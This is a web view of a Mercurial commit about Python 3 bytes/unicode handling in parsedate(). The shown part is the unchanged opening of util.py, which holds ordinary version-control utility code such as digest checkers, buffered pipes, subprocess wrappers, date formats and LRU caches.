##// END OF EJS Templates
py3: work around bytes/unicode divergence in parsedate()
Yuya Nishihara -
r34358:b76937fa default
parent child Browse files
Show More
@@ -1,3831 +1,3833 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import calendar
21 21 import codecs
22 22 import collections
23 23 import contextlib
24 24 import datetime
25 25 import errno
26 26 import gc
27 27 import hashlib
28 28 import imp
29 29 import mmap
30 30 import os
31 31 import platform as pyplatform
32 32 import re as remod
33 33 import shutil
34 34 import signal
35 35 import socket
36 36 import stat
37 37 import string
38 38 import subprocess
39 39 import sys
40 40 import tempfile
41 41 import textwrap
42 42 import time
43 43 import traceback
44 44 import warnings
45 45 import zlib
46 46
47 47 from . import (
48 48 encoding,
49 49 error,
50 50 i18n,
51 51 policy,
52 52 pycompat,
53 53 )
54 54
55 55 base85 = policy.importmod(r'base85')
56 56 osutil = policy.importmod(r'osutil')
57 57 parsers = policy.importmod(r'parsers')
58 58
59 59 b85decode = base85.b85decode
60 60 b85encode = base85.b85encode
61 61
62 62 cookielib = pycompat.cookielib
63 63 empty = pycompat.empty
64 64 httplib = pycompat.httplib
65 65 httpserver = pycompat.httpserver
66 66 pickle = pycompat.pickle
67 67 queue = pycompat.queue
68 68 socketserver = pycompat.socketserver
69 69 stderr = pycompat.stderr
70 70 stdin = pycompat.stdin
71 71 stdout = pycompat.stdout
72 72 stringio = pycompat.stringio
73 73 urlerr = pycompat.urlerr
74 74 urlreq = pycompat.urlreq
75 75 xmlrpclib = pycompat.xmlrpclib
76 76
77 77 # workaround for win32mbcs
78 78 _filenamebytestr = pycompat.bytestr
79 79
80 80 def isatty(fp):
81 81 try:
82 82 return fp.isatty()
83 83 except AttributeError:
84 84 return False
85 85
86 86 # glibc determines buffering on first write to stdout - if we replace a TTY
87 87 # destined stdout with a pipe destined stdout (e.g. pager), we want line
88 88 # buffering
89 89 if isatty(stdout):
90 90 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
91 91
92 92 if pycompat.osname == 'nt':
93 93 from . import windows as platform
94 94 stdout = platform.winstdout(stdout)
95 95 else:
96 96 from . import posix as platform
97 97
98 98 _ = i18n._
99 99
100 100 bindunixsocket = platform.bindunixsocket
101 101 cachestat = platform.cachestat
102 102 checkexec = platform.checkexec
103 103 checklink = platform.checklink
104 104 copymode = platform.copymode
105 105 executablepath = platform.executablepath
106 106 expandglobs = platform.expandglobs
107 107 explainexit = platform.explainexit
108 108 findexe = platform.findexe
109 109 gethgcmd = platform.gethgcmd
110 110 getuser = platform.getuser
111 111 getpid = os.getpid
112 112 groupmembers = platform.groupmembers
113 113 groupname = platform.groupname
114 114 hidewindow = platform.hidewindow
115 115 isexec = platform.isexec
116 116 isowner = platform.isowner
117 117 listdir = osutil.listdir
118 118 localpath = platform.localpath
119 119 lookupreg = platform.lookupreg
120 120 makedir = platform.makedir
121 121 nlinks = platform.nlinks
122 122 normpath = platform.normpath
123 123 normcase = platform.normcase
124 124 normcasespec = platform.normcasespec
125 125 normcasefallback = platform.normcasefallback
126 126 openhardlinks = platform.openhardlinks
127 127 oslink = platform.oslink
128 128 parsepatchoutput = platform.parsepatchoutput
129 129 pconvert = platform.pconvert
130 130 poll = platform.poll
131 131 popen = platform.popen
132 132 posixfile = platform.posixfile
133 133 quotecommand = platform.quotecommand
134 134 readpipe = platform.readpipe
135 135 rename = platform.rename
136 136 removedirs = platform.removedirs
137 137 samedevice = platform.samedevice
138 138 samefile = platform.samefile
139 139 samestat = platform.samestat
140 140 setbinary = platform.setbinary
141 141 setflags = platform.setflags
142 142 setsignalhandler = platform.setsignalhandler
143 143 shellquote = platform.shellquote
144 144 spawndetached = platform.spawndetached
145 145 split = platform.split
146 146 sshargs = platform.sshargs
147 147 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
148 148 statisexec = platform.statisexec
149 149 statislink = platform.statislink
150 150 testpid = platform.testpid
151 151 umask = platform.umask
152 152 unlink = platform.unlink
153 153 username = platform.username
154 154
155 155 try:
156 156 recvfds = osutil.recvfds
157 157 except AttributeError:
158 158 pass
159 159 try:
160 160 setprocname = osutil.setprocname
161 161 except AttributeError:
162 162 pass
163 163
164 164 # Python compatibility
165 165
166 166 _notset = object()
167 167
168 168 # disable Python's problematic floating point timestamps (issue4836)
169 169 # (Python hypocritically says you shouldn't change this behavior in
170 170 # libraries, and sure enough Mercurial is not a library.)
171 171 os.stat_float_times(False)
172 172
173 173 def safehasattr(thing, attr):
174 174 return getattr(thing, attr, _notset) is not _notset
175 175
176 176 def bytesinput(fin, fout, *args, **kwargs):
177 177 sin, sout = sys.stdin, sys.stdout
178 178 try:
179 179 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
180 180 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
181 181 finally:
182 182 sys.stdin, sys.stdout = sin, sout
183 183
184 184 def bitsfrom(container):
185 185 bits = 0
186 186 for bit in container:
187 187 bits |= bit
188 188 return bits
189 189
190 190 # python 2.6 still have deprecation warning enabled by default. We do not want
191 191 # to display anything to standard user so detect if we are running test and
192 192 # only use python deprecation warning in this case.
193 193 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
194 194 if _dowarn:
195 195 # explicitly unfilter our warning for python 2.7
196 196 #
197 197 # The option of setting PYTHONWARNINGS in the test runner was investigated.
198 198 # However, module name set through PYTHONWARNINGS was exactly matched, so
199 199 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
200 200 # makes the whole PYTHONWARNINGS thing useless for our usecase.
201 201 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
202 202 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
203 203 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
204 204
205 205 def nouideprecwarn(msg, version, stacklevel=1):
206 206 """Issue an python native deprecation warning
207 207
208 208 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
209 209 """
210 210 if _dowarn:
211 211 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
212 212 " update your code.)") % version
213 213 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
214 214
215 215 DIGESTS = {
216 216 'md5': hashlib.md5,
217 217 'sha1': hashlib.sha1,
218 218 'sha512': hashlib.sha512,
219 219 }
220 220 # List of digest types from strongest to weakest
221 221 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
222 222
223 223 for k in DIGESTS_BY_STRENGTH:
224 224 assert k in DIGESTS
225 225
226 226 class digester(object):
227 227 """helper to compute digests.
228 228
229 229 This helper can be used to compute one or more digests given their name.
230 230
231 231 >>> d = digester([b'md5', b'sha1'])
232 232 >>> d.update(b'foo')
233 233 >>> [k for k in sorted(d)]
234 234 ['md5', 'sha1']
235 235 >>> d[b'md5']
236 236 'acbd18db4cc2f85cedef654fccc4a4d8'
237 237 >>> d[b'sha1']
238 238 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
239 239 >>> digester.preferred([b'md5', b'sha1'])
240 240 'sha1'
241 241 """
242 242
243 243 def __init__(self, digests, s=''):
244 244 self._hashes = {}
245 245 for k in digests:
246 246 if k not in DIGESTS:
247 247 raise Abort(_('unknown digest type: %s') % k)
248 248 self._hashes[k] = DIGESTS[k]()
249 249 if s:
250 250 self.update(s)
251 251
252 252 def update(self, data):
253 253 for h in self._hashes.values():
254 254 h.update(data)
255 255
256 256 def __getitem__(self, key):
257 257 if key not in DIGESTS:
258 258 raise Abort(_('unknown digest type: %s') % k)
259 259 return self._hashes[key].hexdigest()
260 260
261 261 def __iter__(self):
262 262 return iter(self._hashes)
263 263
264 264 @staticmethod
265 265 def preferred(supported):
266 266 """returns the strongest digest type in both supported and DIGESTS."""
267 267
268 268 for k in DIGESTS_BY_STRENGTH:
269 269 if k in supported:
270 270 return k
271 271 return None
272 272
273 273 class digestchecker(object):
274 274 """file handle wrapper that additionally checks content against a given
275 275 size and digests.
276 276
277 277 d = digestchecker(fh, size, {'md5': '...'})
278 278
279 279 When multiple digests are given, all of them are validated.
280 280 """
281 281
282 282 def __init__(self, fh, size, digests):
283 283 self._fh = fh
284 284 self._size = size
285 285 self._got = 0
286 286 self._digests = dict(digests)
287 287 self._digester = digester(self._digests.keys())
288 288
289 289 def read(self, length=-1):
290 290 content = self._fh.read(length)
291 291 self._digester.update(content)
292 292 self._got += len(content)
293 293 return content
294 294
295 295 def validate(self):
296 296 if self._size != self._got:
297 297 raise Abort(_('size mismatch: expected %d, got %d') %
298 298 (self._size, self._got))
299 299 for k, v in self._digests.items():
300 300 if v != self._digester[k]:
301 301 # i18n: first parameter is a digest name
302 302 raise Abort(_('%s mismatch: expected %s, got %s') %
303 303 (k, v, self._digester[k]))
304 304
305 305 try:
306 306 buffer = buffer
307 307 except NameError:
308 308 def buffer(sliceable, offset=0, length=None):
309 309 if length is not None:
310 310 return memoryview(sliceable)[offset:offset + length]
311 311 return memoryview(sliceable)[offset:]
312 312
313 313 closefds = pycompat.osname == 'posix'
314 314
315 315 _chunksize = 4096
316 316
317 317 class bufferedinputpipe(object):
318 318 """a manually buffered input pipe
319 319
320 320 Python will not let us use buffered IO and lazy reading with 'polling' at
321 321 the same time. We cannot probe the buffer state and select will not detect
322 322 that data are ready to read if they are already buffered.
323 323
324 324 This class let us work around that by implementing its own buffering
325 325 (allowing efficient readline) while offering a way to know if the buffer is
326 326 empty from the output (allowing collaboration of the buffer with polling).
327 327
328 328 This class lives in the 'util' module because it makes use of the 'os'
329 329 module from the python stdlib.
330 330 """
331 331
332 332 def __init__(self, input):
333 333 self._input = input
334 334 self._buffer = []
335 335 self._eof = False
336 336 self._lenbuf = 0
337 337
338 338 @property
339 339 def hasbuffer(self):
340 340 """True is any data is currently buffered
341 341
342 342 This will be used externally a pre-step for polling IO. If there is
343 343 already data then no polling should be set in place."""
344 344 return bool(self._buffer)
345 345
346 346 @property
347 347 def closed(self):
348 348 return self._input.closed
349 349
350 350 def fileno(self):
351 351 return self._input.fileno()
352 352
353 353 def close(self):
354 354 return self._input.close()
355 355
356 356 def read(self, size):
357 357 while (not self._eof) and (self._lenbuf < size):
358 358 self._fillbuffer()
359 359 return self._frombuffer(size)
360 360
361 361 def readline(self, *args, **kwargs):
362 362 if 1 < len(self._buffer):
363 363 # this should not happen because both read and readline end with a
364 364 # _frombuffer call that collapse it.
365 365 self._buffer = [''.join(self._buffer)]
366 366 self._lenbuf = len(self._buffer[0])
367 367 lfi = -1
368 368 if self._buffer:
369 369 lfi = self._buffer[-1].find('\n')
370 370 while (not self._eof) and lfi < 0:
371 371 self._fillbuffer()
372 372 if self._buffer:
373 373 lfi = self._buffer[-1].find('\n')
374 374 size = lfi + 1
375 375 if lfi < 0: # end of file
376 376 size = self._lenbuf
377 377 elif 1 < len(self._buffer):
378 378 # we need to take previous chunks into account
379 379 size += self._lenbuf - len(self._buffer[-1])
380 380 return self._frombuffer(size)
381 381
382 382 def _frombuffer(self, size):
383 383 """return at most 'size' data from the buffer
384 384
385 385 The data are removed from the buffer."""
386 386 if size == 0 or not self._buffer:
387 387 return ''
388 388 buf = self._buffer[0]
389 389 if 1 < len(self._buffer):
390 390 buf = ''.join(self._buffer)
391 391
392 392 data = buf[:size]
393 393 buf = buf[len(data):]
394 394 if buf:
395 395 self._buffer = [buf]
396 396 self._lenbuf = len(buf)
397 397 else:
398 398 self._buffer = []
399 399 self._lenbuf = 0
400 400 return data
401 401
402 402 def _fillbuffer(self):
403 403 """read data to the buffer"""
404 404 data = os.read(self._input.fileno(), _chunksize)
405 405 if not data:
406 406 self._eof = True
407 407 else:
408 408 self._lenbuf += len(data)
409 409 self._buffer.append(data)
410 410
411 411 def mmapread(fp):
412 412 try:
413 413 fd = getattr(fp, 'fileno', lambda: fp)()
414 414 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
415 415 except ValueError:
416 416 # Empty files cannot be mmapped, but mmapread should still work. Check
417 417 # if the file is empty, and if so, return an empty buffer.
418 418 if os.fstat(fd).st_size == 0:
419 419 return ''
420 420 raise
421 421
422 422 def popen2(cmd, env=None, newlines=False):
423 423 # Setting bufsize to -1 lets the system decide the buffer size.
424 424 # The default for bufsize is 0, meaning unbuffered. This leads to
425 425 # poor performance on Mac OS X: http://bugs.python.org/issue4194
426 426 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
427 427 close_fds=closefds,
428 428 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
429 429 universal_newlines=newlines,
430 430 env=env)
431 431 return p.stdin, p.stdout
432 432
433 433 def popen3(cmd, env=None, newlines=False):
434 434 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
435 435 return stdin, stdout, stderr
436 436
437 437 def popen4(cmd, env=None, newlines=False, bufsize=-1):
438 438 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
439 439 close_fds=closefds,
440 440 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
441 441 stderr=subprocess.PIPE,
442 442 universal_newlines=newlines,
443 443 env=env)
444 444 return p.stdin, p.stdout, p.stderr, p
445 445
446 446 def version():
447 447 """Return version information if available."""
448 448 try:
449 449 from . import __version__
450 450 return __version__.version
451 451 except ImportError:
452 452 return 'unknown'
453 453
454 454 def versiontuple(v=None, n=4):
455 455 """Parses a Mercurial version string into an N-tuple.
456 456
457 457 The version string to be parsed is specified with the ``v`` argument.
458 458 If it isn't defined, the current Mercurial version string will be parsed.
459 459
460 460 ``n`` can be 2, 3, or 4. Here is how some version strings map to
461 461 returned values:
462 462
463 463 >>> v = b'3.6.1+190-df9b73d2d444'
464 464 >>> versiontuple(v, 2)
465 465 (3, 6)
466 466 >>> versiontuple(v, 3)
467 467 (3, 6, 1)
468 468 >>> versiontuple(v, 4)
469 469 (3, 6, 1, '190-df9b73d2d444')
470 470
471 471 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
472 472 (3, 6, 1, '190-df9b73d2d444+20151118')
473 473
474 474 >>> v = b'3.6'
475 475 >>> versiontuple(v, 2)
476 476 (3, 6)
477 477 >>> versiontuple(v, 3)
478 478 (3, 6, None)
479 479 >>> versiontuple(v, 4)
480 480 (3, 6, None, None)
481 481
482 482 >>> v = b'3.9-rc'
483 483 >>> versiontuple(v, 2)
484 484 (3, 9)
485 485 >>> versiontuple(v, 3)
486 486 (3, 9, None)
487 487 >>> versiontuple(v, 4)
488 488 (3, 9, None, 'rc')
489 489
490 490 >>> v = b'3.9-rc+2-02a8fea4289b'
491 491 >>> versiontuple(v, 2)
492 492 (3, 9)
493 493 >>> versiontuple(v, 3)
494 494 (3, 9, None)
495 495 >>> versiontuple(v, 4)
496 496 (3, 9, None, 'rc+2-02a8fea4289b')
497 497 """
498 498 if not v:
499 499 v = version()
500 500 parts = remod.split('[\+-]', v, 1)
501 501 if len(parts) == 1:
502 502 vparts, extra = parts[0], None
503 503 else:
504 504 vparts, extra = parts
505 505
506 506 vints = []
507 507 for i in vparts.split('.'):
508 508 try:
509 509 vints.append(int(i))
510 510 except ValueError:
511 511 break
512 512 # (3, 6) -> (3, 6, None)
513 513 while len(vints) < 3:
514 514 vints.append(None)
515 515
516 516 if n == 2:
517 517 return (vints[0], vints[1])
518 518 if n == 3:
519 519 return (vints[0], vints[1], vints[2])
520 520 if n == 4:
521 521 return (vints[0], vints[1], vints[2], extra)
522 522
523 523 # used by parsedate
524 524 defaultdateformats = (
525 525 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
526 526 '%Y-%m-%dT%H:%M', # without seconds
527 527 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
528 528 '%Y-%m-%dT%H%M', # without seconds
529 529 '%Y-%m-%d %H:%M:%S', # our common legal variant
530 530 '%Y-%m-%d %H:%M', # without seconds
531 531 '%Y-%m-%d %H%M%S', # without :
532 532 '%Y-%m-%d %H%M', # without seconds
533 533 '%Y-%m-%d %I:%M:%S%p',
534 534 '%Y-%m-%d %H:%M',
535 535 '%Y-%m-%d %I:%M%p',
536 536 '%Y-%m-%d',
537 537 '%m-%d',
538 538 '%m/%d',
539 539 '%m/%d/%y',
540 540 '%m/%d/%Y',
541 541 '%a %b %d %H:%M:%S %Y',
542 542 '%a %b %d %I:%M:%S%p %Y',
543 543 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
544 544 '%b %d %H:%M:%S %Y',
545 545 '%b %d %I:%M:%S%p %Y',
546 546 '%b %d %H:%M:%S',
547 547 '%b %d %I:%M:%S%p',
548 548 '%b %d %H:%M',
549 549 '%b %d %I:%M%p',
550 550 '%b %d %Y',
551 551 '%b %d',
552 552 '%H:%M:%S',
553 553 '%I:%M:%S%p',
554 554 '%H:%M',
555 555 '%I:%M%p',
556 556 )
557 557
558 558 extendeddateformats = defaultdateformats + (
559 559 "%Y",
560 560 "%Y-%m",
561 561 "%b",
562 562 "%b %Y",
563 563 )
564 564
565 565 def cachefunc(func):
566 566 '''cache the result of function calls'''
567 567 # XXX doesn't handle keywords args
568 568 if func.__code__.co_argcount == 0:
569 569 cache = []
570 570 def f():
571 571 if len(cache) == 0:
572 572 cache.append(func())
573 573 return cache[0]
574 574 return f
575 575 cache = {}
576 576 if func.__code__.co_argcount == 1:
577 577 # we gain a small amount of time because
578 578 # we don't need to pack/unpack the list
579 579 def f(arg):
580 580 if arg not in cache:
581 581 cache[arg] = func(arg)
582 582 return cache[arg]
583 583 else:
584 584 def f(*args):
585 585 if args not in cache:
586 586 cache[args] = func(*args)
587 587 return cache[args]
588 588
589 589 return f
590 590
591 591 class cow(object):
592 592 """helper class to make copy-on-write easier
593 593
594 594 Call preparewrite before doing any writes.
595 595 """
596 596
597 597 def preparewrite(self):
598 598 """call this before writes, return self or a copied new object"""
599 599 if getattr(self, '_copied', 0):
600 600 self._copied -= 1
601 601 return self.__class__(self)
602 602 return self
603 603
604 604 def copy(self):
605 605 """always do a cheap copy"""
606 606 self._copied = getattr(self, '_copied', 0) + 1
607 607 return self
608 608
609 609 class sortdict(collections.OrderedDict):
610 610 '''a simple sorted dictionary
611 611
612 612 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
613 613 >>> d2 = d1.copy()
614 614 >>> d2
615 615 sortdict([('a', 0), ('b', 1)])
616 616 >>> d2.update([(b'a', 2)])
617 617 >>> list(d2.keys()) # should still be in last-set order
618 618 ['b', 'a']
619 619 '''
620 620
621 621 def __setitem__(self, key, value):
622 622 if key in self:
623 623 del self[key]
624 624 super(sortdict, self).__setitem__(key, value)
625 625
626 626 if pycompat.ispypy:
627 627 # __setitem__() isn't called as of PyPy 5.8.0
628 628 def update(self, src):
629 629 if isinstance(src, dict):
630 630 src = src.iteritems()
631 631 for k, v in src:
632 632 self[k] = v
633 633
634 634 class cowdict(cow, dict):
635 635 """copy-on-write dict
636 636
637 637 Be sure to call d = d.preparewrite() before writing to d.
638 638
639 639 >>> a = cowdict()
640 640 >>> a is a.preparewrite()
641 641 True
642 642 >>> b = a.copy()
643 643 >>> b is a
644 644 True
645 645 >>> c = b.copy()
646 646 >>> c is a
647 647 True
648 648 >>> a = a.preparewrite()
649 649 >>> b is a
650 650 False
651 651 >>> a is a.preparewrite()
652 652 True
653 653 >>> c = c.preparewrite()
654 654 >>> b is c
655 655 False
656 656 >>> b is b.preparewrite()
657 657 True
658 658 """
659 659
660 660 class cowsortdict(cow, sortdict):
661 661 """copy-on-write sortdict
662 662
663 663 Be sure to call d = d.preparewrite() before writing to d.
664 664 """
665 665
666 666 class transactional(object):
667 667 """Base class for making a transactional type into a context manager."""
668 668 __metaclass__ = abc.ABCMeta
669 669
670 670 @abc.abstractmethod
671 671 def close(self):
672 672 """Successfully closes the transaction."""
673 673
674 674 @abc.abstractmethod
675 675 def release(self):
676 676 """Marks the end of the transaction.
677 677
678 678 If the transaction has not been closed, it will be aborted.
679 679 """
680 680
681 681 def __enter__(self):
682 682 return self
683 683
684 684 def __exit__(self, exc_type, exc_val, exc_tb):
685 685 try:
686 686 if exc_type is None:
687 687 self.close()
688 688 finally:
689 689 self.release()
690 690
691 691 @contextlib.contextmanager
692 692 def acceptintervention(tr=None):
693 693 """A context manager that closes the transaction on InterventionRequired
694 694
695 695 If no transaction was provided, this simply runs the body and returns
696 696 """
697 697 if not tr:
698 698 yield
699 699 return
700 700 try:
701 701 yield
702 702 tr.close()
703 703 except error.InterventionRequired:
704 704 tr.close()
705 705 raise
706 706 finally:
707 707 tr.release()
708 708
709 709 @contextlib.contextmanager
710 710 def nullcontextmanager():
711 711 yield
712 712
713 713 class _lrucachenode(object):
714 714 """A node in a doubly linked list.
715 715
716 716 Holds a reference to nodes on either side as well as a key-value
717 717 pair for the dictionary entry.
718 718 """
719 719 __slots__ = (u'next', u'prev', u'key', u'value')
720 720
721 721 def __init__(self):
722 722 self.next = None
723 723 self.prev = None
724 724
725 725 self.key = _notset
726 726 self.value = None
727 727
728 728 def markempty(self):
729 729 """Mark the node as emptied."""
730 730 self.key = _notset
731 731
732 732 class lrucachedict(object):
733 733 """Dict that caches most recent accesses and sets.
734 734
735 735 The dict consists of an actual backing dict - indexed by original
736 736 key - and a doubly linked circular list defining the order of entries in
737 737 the cache.
738 738
739 739 The head node is the newest entry in the cache. If the cache is full,
740 740 we recycle head.prev and make it the new head. Cache accesses result in
741 741 the node being moved to before the existing head and being marked as the
742 742 new head node.
743 743 """
744 744 def __init__(self, max):
745 745 self._cache = {}
746 746
747 747 self._head = head = _lrucachenode()
748 748 head.prev = head
749 749 head.next = head
750 750 self._size = 1
751 751 self._capacity = max
752 752
753 753 def __len__(self):
754 754 return len(self._cache)
755 755
756 756 def __contains__(self, k):
757 757 return k in self._cache
758 758
759 759 def __iter__(self):
760 760 # We don't have to iterate in cache order, but why not.
761 761 n = self._head
762 762 for i in range(len(self._cache)):
763 763 yield n.key
764 764 n = n.next
765 765
766 766 def __getitem__(self, k):
767 767 node = self._cache[k]
768 768 self._movetohead(node)
769 769 return node.value
770 770
771 771 def __setitem__(self, k, v):
772 772 node = self._cache.get(k)
773 773 # Replace existing value and mark as newest.
774 774 if node is not None:
775 775 node.value = v
776 776 self._movetohead(node)
777 777 return
778 778
779 779 if self._size < self._capacity:
780 780 node = self._addcapacity()
781 781 else:
782 782 # Grab the last/oldest item.
783 783 node = self._head.prev
784 784
785 785 # At capacity. Kill the old entry.
786 786 if node.key is not _notset:
787 787 del self._cache[node.key]
788 788
789 789 node.key = k
790 790 node.value = v
791 791 self._cache[k] = node
792 792 # And mark it as newest entry. No need to adjust order since it
793 793 # is already self._head.prev.
794 794 self._head = node
795 795
796 796 def __delitem__(self, k):
797 797 node = self._cache.pop(k)
798 798 node.markempty()
799 799
800 800 # Temporarily mark as newest item before re-adjusting head to make
801 801 # this node the oldest item.
802 802 self._movetohead(node)
803 803 self._head = node.next
804 804
805 805 # Additional dict methods.
806 806
807 807 def get(self, k, default=None):
808 808 try:
809 809 return self._cache[k].value
810 810 except KeyError:
811 811 return default
812 812
813 813 def clear(self):
814 814 n = self._head
815 815 while n.key is not _notset:
816 816 n.markempty()
817 817 n = n.next
818 818
819 819 self._cache.clear()
820 820
821 821 def copy(self):
822 822 result = lrucachedict(self._capacity)
823 823 n = self._head.prev
824 824 # Iterate in oldest-to-newest order, so the copy has the right ordering
825 825 for i in range(len(self._cache)):
826 826 result[n.key] = n.value
827 827 n = n.prev
828 828 return result
829 829
830 830 def _movetohead(self, node):
831 831 """Mark a node as the newest, making it the new head.
832 832
833 833 When a node is accessed, it becomes the freshest entry in the LRU
834 834 list, which is denoted by self._head.
835 835
836 836 Visually, let's make ``N`` the new head node (* denotes head):
837 837
838 838 previous/oldest <-> head <-> next/next newest
839 839
840 840 ----<->--- A* ---<->-----
841 841 | |
842 842 E <-> D <-> N <-> C <-> B
843 843
844 844 To:
845 845
846 846 ----<->--- N* ---<->-----
847 847 | |
848 848 E <-> D <-> C <-> B <-> A
849 849
850 850 This requires the following moves:
851 851
852 852 C.next = D (node.prev.next = node.next)
853 853 D.prev = C (node.next.prev = node.prev)
854 854 E.next = N (head.prev.next = node)
855 855 N.prev = E (node.prev = head.prev)
856 856 N.next = A (node.next = head)
857 857 A.prev = N (head.prev = node)
858 858 """
859 859 head = self._head
860 860 # C.next = D
861 861 node.prev.next = node.next
862 862 # D.prev = C
863 863 node.next.prev = node.prev
864 864 # N.prev = E
865 865 node.prev = head.prev
866 866 # N.next = A
867 867 # It is tempting to do just "head" here, however if node is
868 868 # adjacent to head, this will do bad things.
869 869 node.next = head.prev.next
870 870 # E.next = N
871 871 node.next.prev = node
872 872 # A.prev = N
873 873 node.prev.next = node
874 874
875 875 self._head = node
876 876
877 877 def _addcapacity(self):
878 878 """Add a node to the circular linked list.
879 879
880 880 The new node is inserted before the head node.
881 881 """
882 882 head = self._head
883 883 node = _lrucachenode()
884 884 head.prev.next = node
885 885 node.prev = head.prev
886 886 node.next = head
887 887 head.prev = node
888 888 self._size += 1
889 889 return node
890 890
891 891 def lrucachefunc(func):
892 892 '''cache most recent results of function calls'''
893 893 cache = {}
894 894 order = collections.deque()
895 895 if func.__code__.co_argcount == 1:
896 896 def f(arg):
897 897 if arg not in cache:
898 898 if len(cache) > 20:
899 899 del cache[order.popleft()]
900 900 cache[arg] = func(arg)
901 901 else:
902 902 order.remove(arg)
903 903 order.append(arg)
904 904 return cache[arg]
905 905 else:
906 906 def f(*args):
907 907 if args not in cache:
908 908 if len(cache) > 20:
909 909 del cache[order.popleft()]
910 910 cache[args] = func(*args)
911 911 else:
912 912 order.remove(args)
913 913 order.append(args)
914 914 return cache[args]
915 915
916 916 return f
917 917
918 918 class propertycache(object):
919 919 def __init__(self, func):
920 920 self.func = func
921 921 self.name = func.__name__
922 922 def __get__(self, obj, type=None):
923 923 result = self.func(obj)
924 924 self.cachevalue(obj, result)
925 925 return result
926 926
927 927 def cachevalue(self, obj, value):
928 928 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
929 929 obj.__dict__[self.name] = value
930 930
931 931 def pipefilter(s, cmd):
932 932 '''filter string S through command CMD, returning its output'''
933 933 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
934 934 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
935 935 pout, perr = p.communicate(s)
936 936 return pout
937 937
938 938 def tempfilter(s, cmd):
939 939 '''filter string S through a pair of temporary files with CMD.
940 940 CMD is used as a template to create the real command to be run,
941 941 with the strings INFILE and OUTFILE replaced by the real names of
942 942 the temporary files generated.'''
943 943 inname, outname = None, None
944 944 try:
945 945 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
946 946 fp = os.fdopen(infd, pycompat.sysstr('wb'))
947 947 fp.write(s)
948 948 fp.close()
949 949 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
950 950 os.close(outfd)
951 951 cmd = cmd.replace('INFILE', inname)
952 952 cmd = cmd.replace('OUTFILE', outname)
953 953 code = os.system(cmd)
954 954 if pycompat.sysplatform == 'OpenVMS' and code & 1:
955 955 code = 0
956 956 if code:
957 957 raise Abort(_("command '%s' failed: %s") %
958 958 (cmd, explainexit(code)))
959 959 return readfile(outname)
960 960 finally:
961 961 try:
962 962 if inname:
963 963 os.unlink(inname)
964 964 except OSError:
965 965 pass
966 966 try:
967 967 if outname:
968 968 os.unlink(outname)
969 969 except OSError:
970 970 pass
971 971
972 972 filtertable = {
973 973 'tempfile:': tempfilter,
974 974 'pipe:': pipefilter,
975 975 }
976 976
977 977 def filter(s, cmd):
978 978 "filter a string through a command that transforms its input to its output"
979 979 for name, fn in filtertable.iteritems():
980 980 if cmd.startswith(name):
981 981 return fn(s, cmd[len(name):].lstrip())
982 982 return pipefilter(s, cmd)
983 983
984 984 def binary(s):
985 985 """return true if a string is binary data"""
986 986 return bool(s and '\0' in s)
987 987
988 988 def increasingchunks(source, min=1024, max=65536):
989 989 '''return no less than min bytes per chunk while data remains,
990 990 doubling min after each chunk until it reaches max'''
991 991 def log2(x):
992 992 if not x:
993 993 return 0
994 994 i = 0
995 995 while x:
996 996 x >>= 1
997 997 i += 1
998 998 return i - 1
999 999
1000 1000 buf = []
1001 1001 blen = 0
1002 1002 for chunk in source:
1003 1003 buf.append(chunk)
1004 1004 blen += len(chunk)
1005 1005 if blen >= min:
1006 1006 if min < max:
1007 1007 min = min << 1
1008 1008 nmin = 1 << log2(blen)
1009 1009 if nmin > min:
1010 1010 min = nmin
1011 1011 if min > max:
1012 1012 min = max
1013 1013 yield ''.join(buf)
1014 1014 blen = 0
1015 1015 buf = []
1016 1016 if buf:
1017 1017 yield ''.join(buf)
1018 1018
1019 1019 Abort = error.Abort
1020 1020
1021 1021 def always(fn):
1022 1022 return True
1023 1023
1024 1024 def never(fn):
1025 1025 return False
1026 1026
1027 1027 def nogc(func):
1028 1028 """disable garbage collector
1029 1029
1030 1030 Python's garbage collector triggers a GC each time a certain number of
1031 1031 container objects (the number being defined by gc.get_threshold()) are
1032 1032 allocated even when marked not to be tracked by the collector. Tracking has
1033 1033 no effect on when GCs are triggered, only on what objects the GC looks
1034 1034 into. As a workaround, disable GC while building complex (huge)
1035 1035 containers.
1036 1036
1037 1037 This garbage collector issue have been fixed in 2.7. But it still affect
1038 1038 CPython's performance.
